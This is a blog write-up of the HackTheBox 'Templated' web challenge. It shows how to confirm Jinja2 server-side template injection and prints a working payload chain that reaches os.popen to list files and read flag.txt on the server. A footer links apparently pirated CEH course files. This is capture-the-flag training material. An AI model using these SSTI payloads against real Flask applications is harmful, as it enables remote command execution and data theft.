HACKTHEBOX CHALLENG TEMPLATED

                                                                     HackTheBox

                                      CHALLENGE TITLE: Templated


templated

The second challenge under the web and most of the votes are for easy. Let's try it out.

CHALLENGE TITLETemplated

CHALLENGE DESCRIPTIONCan you exploit this simple mistake?

It is related to Flask/Jinja2. Btw Jinja2 is a web template engine for Python. The challenge title is also templated! maybe it is related to SSTI (Server Side Template Injection).

Payload 1http://134.209.16.184:32694/{{100+100}}

Result: it gives 200 as output.

So we found two vulnerabilities. What else can be done with SSTI apart from adding numbers? Here is a good article on SSTI with Jinja2 you can refer to.

So we can use the MRO function to display classes, which will come in extremely handy for building python SSTI Jinja2 payloads.

Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

so the URL will look something like this:

http://64.227.43.192:32601/{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("ls *").read()}}

templated-flag.png

this lists all the files and guesses what we can see flag.txt. All we need to do now is to replace ls * with cat flag.txt.

Final Payload:

{{"".__class__.__mro__[1].__subclasses__()[186].__init__.__globals__["__builtins__"]["__import__"]("os").popen("cat flag.txt").read()}}

and boom! you have the flag.

I would recommend trying running each component of the payload as an individual payload just to understand what's the output of each component.

See you on the next challenge. 

Comments

Post a Comment

Popular posts from this blog

🔰 CHE v10 🔰

*CEH v10 Download With PDF,Tools & Videos Files* Module 00: Introduction and Table of Contents http://www.mediafire.com/file/qzo9ptf01lvoawf/CEH+v10+Module+00+-++Introduction+and+table+of+Contents.pdf Module 01: Introduction to Ethical Hacking http://www.mediafire.com/file/n88nn8e0hytki26/CEH+v10+Module+01+Introduction+to+Ethical+Hacking.pdf Module 02: Footprinting and Reconnaissance http://www.mediafire.com/file/mg2ebx812nx0k2d/CEH+v10+Module+02+-+Footprinting+%26amp%3B+Reconnaissance.pdf Module 03: Scanning Networks http://www.mediafire.com/file/593t654bmvse8as/CEH+v10+Module+03+-+Scanning+Networks.pdf Module 04: Enumeration http://www.mediafire.com/file/rgzufa875ptj5h5/CEH+v10+Module+04+-+Enumeration.pdf Module 05: Vulnerability Analysis http://www.mediafire.com/file/q1ih2ge5f7e9f4q/CEH+v10+Module+05+Vulnerability+Analysis.pdf Module 06: System Hacking http://www.mediafire.com/file/xyh838vmn6k8r3k/CEH+v10+Module+06+System+Hacking.pdf Module 07: Malware Threats ht...
Read more